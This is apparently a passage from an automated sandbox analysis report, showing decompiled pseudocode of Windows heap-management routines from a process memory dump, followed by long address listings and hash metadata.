						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0108A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0108A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E010BD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0106B150();
								} else {
									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0106B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1156378 = 1;
									asm("int3");
									 *0x1156378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0111FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0112A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E010BD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0106B150();
													} else {
														E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0106B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1156378 = 1;
														asm("int3");
														 *0x1156378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0108A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0108A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0108BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0112A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E010BD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0106B150();
													} else {
														E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0106B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1156378 = 1;
														asm("int3");
														 *0x1156378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0108A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0108A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0108BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0108BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                                                            0x010899ca
                                                                                                            0x010899cc
                                                                                                            0x010899df
                                                                                                            0x010899e3
                                                                                                            0x010899f8
                                                                                                            0x010899fb
                                                                                                            0x010899fb
                                                                                                            0x00000000
                                                                                                            0x01089a48
                                                                                                            0x01089a48
                                                                                                            0x01089a4c
                                                                                                            0x01089a51
                                                                                                            0x01089a55
                                                                                                            0x01089a61
                                                                                                            0x01089a66
                                                                                                            0x01089a68
                                                                                                            0x010d1457
                                                                                                            0x010d145c
                                                                                                            0x010d145c
                                                                                                            0x01089a68
                                                                                                            0x01089a6e
                                                                                                            0x01089a71
                                                                                                            0x01089a74
                                                                                                            0x01089a76
                                                                                                            0x010d1466
                                                                                                            0x010d1469
                                                                                                            0x010d1469
                                                                                                            0x010d146c
                                                                                                            0x010d146e
                                                                                                            0x010d1471
                                                                                                            0x010d1474
                                                                                                            0x010d1477
                                                                                                            0x010d1479
                                                                                                            0x010d159c
                                                                                                            0x010d159c
                                                                                                            0x010d159d
                                                                                                            0x010d15a6
                                                                                                            0x010d15ab
                                                                                                            0x010d15ab
                                                                                                            0x00000000
                                                                                                            0x010d15ab
                                                                                                            0x010d147f
                                                                                                            0x010d1481
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d148a
                                                                                                            0x010d148d
                                                                                                            0x010d1493
                                                                                                            0x010d1495
                                                                                                            0x010d14c0
                                                                                                            0x010d14c0
                                                                                                            0x010d14c3
                                                                                                            0x010d14c6
                                                                                                            0x010d14c8
                                                                                                            0x010d14cb
                                                                                                            0x010d14cf
                                                                                                            0x010d14f2
                                                                                                            0x010d14f2
                                                                                                            0x010d14f5
                                                                                                            0x010d14f8
                                                                                                            0x010d1501
                                                                                                            0x010d1508
                                                                                                            0x010d150b
                                                                                                            0x010d150e
                                                                                                            0x010d1510
                                                                                                            0x010d1513
                                                                                                            0x010d1515
                                                                                                            0x010d1515
                                                                                                            0x010d1518
                                                                                                            0x010d1518
                                                                                                            0x010d1513
                                                                                                            0x010d1521
                                                                                                            0x010d1525
                                                                                                            0x010d152a
                                                                                                            0x010d152d
                                                                                                            0x010d1530
                                                                                                            0x010d1532
                                                                                                            0x010d1539
                                                                                                            0x010d153d
                                                                                                            0x010d155d
                                                                                                            0x010d1562
                                                                                                            0x010d153f
                                                                                                            0x010d1555
                                                                                                            0x010d155a
                                                                                                            0x010d1570
                                                                                                            0x010d1577
                                                                                                            0x010d157c
                                                                                                            0x010d1582
                                                                                                            0x010d1585
                                                                                                            0x010d1589
                                                                                                            0x010d158b
                                                                                                            0x010d1592
                                                                                                            0x010d1593
                                                                                                            0x010d1593
                                                                                                            0x010d1589
                                                                                                            0x010d1530
                                                                                                            0x00000000
                                                                                                            0x010d14f8
                                                                                                            0x010d14d5
                                                                                                            0x010d14da
                                                                                                            0x010d14dc
                                                                                                            0x00000000
                                                                                                            0x010d14de
                                                                                                            0x010d14e8
                                                                                                            0x00000000
                                                                                                            0x010d14e8
                                                                                                            0x010d1497
                                                                                                            0x010d1497
                                                                                                            0x010d14a4
                                                                                                            0x010d14a4
                                                                                                            0x010d14a7
                                                                                                            0x010d14a9
                                                                                                            0x010d14ab
                                                                                                            0x010d14ab
                                                                                                            0x010d149c
                                                                                                            0x010d149e
                                                                                                            0x010d14a0
                                                                                                            0x010d14b0
                                                                                                            0x010d14b0
                                                                                                            0x00000000
                                                                                                            0x010d14a2
                                                                                                            0x010d14a2
                                                                                                            0x00000000
                                                                                                            0x010d14a2
                                                                                                            0x010d14a0
                                                                                                            0x010d14b3
                                                                                                            0x010d14bb
                                                                                                            0x00000000
                                                                                                            0x010d14bb
                                                                                                            0x010d1495
                                                                                                            0x01089a7c
                                                                                                            0x01089a7c
                                                                                                            0x01089a7f
                                                                                                            0x01089a7f
                                                                                                            0x01089a82
                                                                                                            0x01089a84
                                                                                                            0x01089a87
                                                                                                            0x01089a8a
                                                                                                            0x01089a8d
                                                                                                            0x01089a8f
                                                                                                            0x010d166a
                                                                                                            0x010d166a
                                                                                                            0x010d166b
                                                                                                            0x010d1674
                                                                                                            0x00000000
                                                                                                            0x010d1674
                                                                                                            0x01089a95
                                                                                                            0x01089a97
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01089aa0
                                                                                                            0x01089aa3
                                                                                                            0x01089aa9
                                                                                                            0x01089aab
                                                                                                            0x01089ad7
                                                                                                            0x01089ad7
                                                                                                            0x01089ada
                                                                                                            0x01089add
                                                                                                            0x01089adf
                                                                                                            0x01089ae2
                                                                                                            0x01089ae6
                                                                                                            0x01089b22
                                                                                                            0x01089b27
                                                                                                            0x01089b29
                                                                                                            0x00000000
                                                                                                            0x01089b2b
                                                                                                            0x010d15be
                                                                                                            0x00000000
                                                                                                            0x010d15be
                                                                                                            0x01089b29
                                                                                                            0x01089ae8
                                                                                                            0x01089ae8
                                                                                                            0x01089aeb
                                                                                                            0x01089aee
                                                                                                            0x010d15cb
                                                                                                            0x010d15d2
                                                                                                            0x010d15d5
                                                                                                            0x010d15d7
                                                                                                            0x010d15da
                                                                                                            0x010d15dc
                                                                                                            0x010d15dc
                                                                                                            0x010d15dc
                                                                                                            0x010d15da
                                                                                                            0x010d15e5
                                                                                                            0x010d15e9
                                                                                                            0x010d15ee
                                                                                                            0x010d15f1
                                                                                                            0x010d15f3
                                                                                                            0x010d15f9
                                                                                                            0x010d1600
                                                                                                            0x010d1604
                                                                                                            0x010d1624
                                                                                                            0x010d1629
                                                                                                            0x010d1606
                                                                                                            0x010d161c
                                                                                                            0x010d1621
                                                                                                            0x010d1637
                                                                                                            0x010d163e
                                                                                                            0x010d1643
                                                                                                            0x010d1649
                                                                                                            0x010d164c
                                                                                                            0x010d1650
                                                                                                            0x010d1656
                                                                                                            0x010d165d
                                                                                                            0x010d165e
                                                                                                            0x010d165e
                                                                                                            0x010d1650
                                                                                                            0x010d15f3
                                                                                                            0x01089af4
                                                                                                            0x01089af7
                                                                                                            0x01089afc
                                                                                                            0x01089b00
                                                                                                            0x01089b04
                                                                                                            0x01089b08
                                                                                                            0x01089b14
                                                                                                            0x010899fe
                                                                                                            0x01089a04
                                                                                                            0x01089a07
                                                                                                            0x00000000
                                                                                                            0x01089a29
                                                                                                            0x010d169c
                                                                                                            0x010d16a0
                                                                                                            0x010d16a5
                                                                                                            0x010d16a9
                                                                                                            0x010d16b5
                                                                                                            0x010d16ba
                                                                                                            0x010d16bc
                                                                                                            0x010d16be
                                                                                                            0x010d16c3
                                                                                                            0x010d16c3
                                                                                                            0x010d16bc
                                                                                                            0x010d16c8
                                                                                                            0x010d16cc
                                                                                                            0x010d181b
                                                                                                            0x010d181b
                                                                                                            0x010d181e
                                                                                                            0x010d181e
                                                                                                            0x010d1821
                                                                                                            0x010d1823
                                                                                                            0x010d1826
                                                                                                            0x010d1829
                                                                                                            0x010d182c
                                                                                                            0x010d182e
                                                                                                            0x010d1688
                                                                                                            0x010d1688
                                                                                                            0x010d1689
                                                                                                            0x010d168b
                                                                                                            0x010d168c
                                                                                                            0x010d168d
                                                                                                            0x010d168f
                                                                                                            0x010d1692
                                                                                                            0x00000000
                                                                                                            0x010d1692
                                                                                                            0x010d1834
                                                                                                            0x010d1836
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d183f
                                                                                                            0x010d1842
                                                                                                            0x010d1848
                                                                                                            0x010d184a
                                                                                                            0x010d1875
                                                                                                            0x010d1875
                                                                                                            0x010d1878
                                                                                                            0x010d187b
                                                                                                            0x010d187d
                                                                                                            0x010d1880
                                                                                                            0x010d1884
                                                                                                            0x010d18a7
                                                                                                            0x010d18a7
                                                                                                            0x010d18aa
                                                                                                            0x010d18ad
                                                                                                            0x010d18b6
                                                                                                            0x010d18bd
                                                                                                            0x010d18c0
                                                                                                            0x010d18c3
                                                                                                            0x010d18c5
                                                                                                            0x010d18c8
                                                                                                            0x010d18ca
                                                                                                            0x010d18ca
                                                                                                            0x010d18cd
                                                                                                            0x010d18cd
                                                                                                            0x010d18c8
                                                                                                            0x010d18d5
                                                                                                            0x010d18da
                                                                                                            0x010d18df
                                                                                                            0x010d18e2
                                                                                                            0x010d18e5
                                                                                                            0x010d18e7
                                                                                                            0x010d18ee
                                                                                                            0x010d18f2
                                                                                                            0x010d1912
                                                                                                            0x010d1917
                                                                                                            0x010d18f4
                                                                                                            0x010d190a
                                                                                                            0x010d190f
                                                                                                            0x010d1925
                                                                                                            0x010d192c
                                                                                                            0x010d1931
                                                                                                            0x010d193a
                                                                                                            0x010d193e
                                                                                                            0x010d1940
                                                                                                            0x010d1947
                                                                                                            0x010d1948
                                                                                                            0x010d1948
                                                                                                            0x010d193e
                                                                                                            0x010d18e5
                                                                                                            0x010d194f
                                                                                                            0x010d1952
                                                                                                            0x010d1956
                                                                                                            0x010d195d
                                                                                                            0x010d1961
                                                                                                            0x010d196d
                                                                                                            0x00000000
                                                                                                            0x010d196d
                                                                                                            0x010d188a
                                                                                                            0x010d188f
                                                                                                            0x010d1891
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d189d
                                                                                                            0x00000000
                                                                                                            0x010d189d
                                                                                                            0x010d184c
                                                                                                            0x010d1859
                                                                                                            0x010d1859
                                                                                                            0x010d185c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1851
                                                                                                            0x010d1853
                                                                                                            0x010d1855
                                                                                                            0x010d1865
                                                                                                            0x010d1865
                                                                                                            0x010d1866
                                                                                                            0x010d1868
                                                                                                            0x010d1870
                                                                                                            0x00000000
                                                                                                            0x010d1870
                                                                                                            0x010d1857
                                                                                                            0x010d1857
                                                                                                            0x010d185e
                                                                                                            0x00000000
                                                                                                            0x010d16d2
                                                                                                            0x010d16d2
                                                                                                            0x010d16d5
                                                                                                            0x010d16d5
                                                                                                            0x010d16d8
                                                                                                            0x010d16da
                                                                                                            0x010d16dd
                                                                                                            0x010d16e0
                                                                                                            0x010d16e3
                                                                                                            0x010d16e5
                                                                                                            0x010d1808
                                                                                                            0x010d1808
                                                                                                            0x010d1809
                                                                                                            0x010d1812
                                                                                                            0x010d1817
                                                                                                            0x010d1817
                                                                                                            0x00000000
                                                                                                            0x010d1817
                                                                                                            0x010d16eb
                                                                                                            0x010d16ed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d16f6
                                                                                                            0x010d16f9
                                                                                                            0x010d16ff
                                                                                                            0x010d1701
                                                                                                            0x010d172c
                                                                                                            0x010d172c
                                                                                                            0x010d172f
                                                                                                            0x010d1732
                                                                                                            0x010d1734
                                                                                                            0x010d1737
                                                                                                            0x010d173b
                                                                                                            0x010d175e
                                                                                                            0x010d175e
                                                                                                            0x010d1761
                                                                                                            0x010d1764
                                                                                                            0x010d176d
                                                                                                            0x010d1774
                                                                                                            0x010d1777
                                                                                                            0x010d177a
                                                                                                            0x010d177c
                                                                                                            0x010d177f
                                                                                                            0x010d1781
                                                                                                            0x010d1781
                                                                                                            0x010d1784
                                                                                                            0x010d1784
                                                                                                            0x010d177f
                                                                                                            0x010d178c
                                                                                                            0x010d1791
                                                                                                            0x010d1796
                                                                                                            0x010d1799
                                                                                                            0x010d179c
                                                                                                            0x010d179e
                                                                                                            0x010d17a5
                                                                                                            0x010d17a9
                                                                                                            0x010d17c9
                                                                                                            0x010d17ce
                                                                                                            0x010d17ab
                                                                                                            0x010d17c1
                                                                                                            0x010d17c6
                                                                                                            0x010d17dc
                                                                                                            0x010d17e3
                                                                                                            0x010d17e8
                                                                                                            0x010d17ee
                                                                                                            0x010d17f1
                                                                                                            0x010d17f5
                                                                                                            0x010d17f7
                                                                                                            0x010d17fe
                                                                                                            0x010d17ff
                                                                                                            0x010d17ff
                                                                                                            0x010d17f5
                                                                                                            0x010d179c
                                                                                                            0x00000000
                                                                                                            0x010d1764
                                                                                                            0x010d1741
                                                                                                            0x010d1746
                                                                                                            0x010d1748
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1754
                                                                                                            0x00000000
                                                                                                            0x010d1754
                                                                                                            0x010d1703
                                                                                                            0x010d1710
                                                                                                            0x010d1710
                                                                                                            0x010d1713
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1708
                                                                                                            0x010d170a
                                                                                                            0x010d170c
                                                                                                            0x010d171c
                                                                                                            0x010d171c
                                                                                                            0x010d171d
                                                                                                            0x010d171f
                                                                                                            0x010d1727
                                                                                                            0x00000000
                                                                                                            0x010d1727
                                                                                                            0x010d170e
                                                                                                            0x010d170e
                                                                                                            0x010d1715
                                                                                                            0x00000000
                                                                                                            0x010d1715
                                                                                                            0x010d16cc
                                                                                                            0x01089a45
                                                                                                            0x01089a45
                                                                                                            0x01089a0e
                                                                                                            0x01089a1c
                                                                                                            0x01089a23
                                                                                                            0x010d167e
                                                                                                            0x010d167f
                                                                                                            0x010d1681
                                                                                                            0x010d1683
                                                                                                            0x010d1684
                                                                                                            0x00000000
                                                                                                            0x010d1684
                                                                                                            0x00000000
                                                                                                            0x01089aad
                                                                                                            0x01089aad
                                                                                                            0x01089ab0
                                                                                                            0x01089ab3
                                                                                                            0x01089ab3
                                                                                                            0x01089ab6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01089ab8
                                                                                                            0x01089aba
                                                                                                            0x01089abc
                                                                                                            0x01089ac8
                                                                                                            0x01089ac8
                                                                                                            0x00000000
                                                                                                            0x01089abe
                                                                                                            0x01089abe
                                                                                                            0x01089ac0
                                                                                                            0x00000000
                                                                                                            0x01089ac0
                                                                                                            0x01089abc
                                                                                                            0x01089ad2
                                                                                                            0x00000000
                                                                                                            0x01089ad2
                                                                                                            0x01089aab

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                            • API String ID: 0-3178619729
                                                                                                            • Opcode ID: b7348c22f792edb86d1ab6838bc2ee0c8931c8782f7a69a273cd97a8dcc05d4b
                                                                                                            • Instruction ID: 92dfac952bb0f6ee2142dc13151b256243770f1aa83f108890781a4c737cd92a
                                                                                                            • Opcode Fuzzy Hash: b7348c22f792edb86d1ab6838bc2ee0c8931c8782f7a69a273cd97a8dcc05d4b
                                                                                                            • Instruction Fuzzy Hash: CD22D070604342DFEB65DF28C485BBABBF5EF45708F1885A9E4C68B246EB35D881CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108B477 Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0108B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x115d360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E0108B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E010AB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x1158748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E0106B150();
						} else {
							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E0106B150();
						__eflags =  *0x1157bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E01122073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x1158a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x115b1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E010A9730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E0112A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E010A9660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E0112138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0111FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
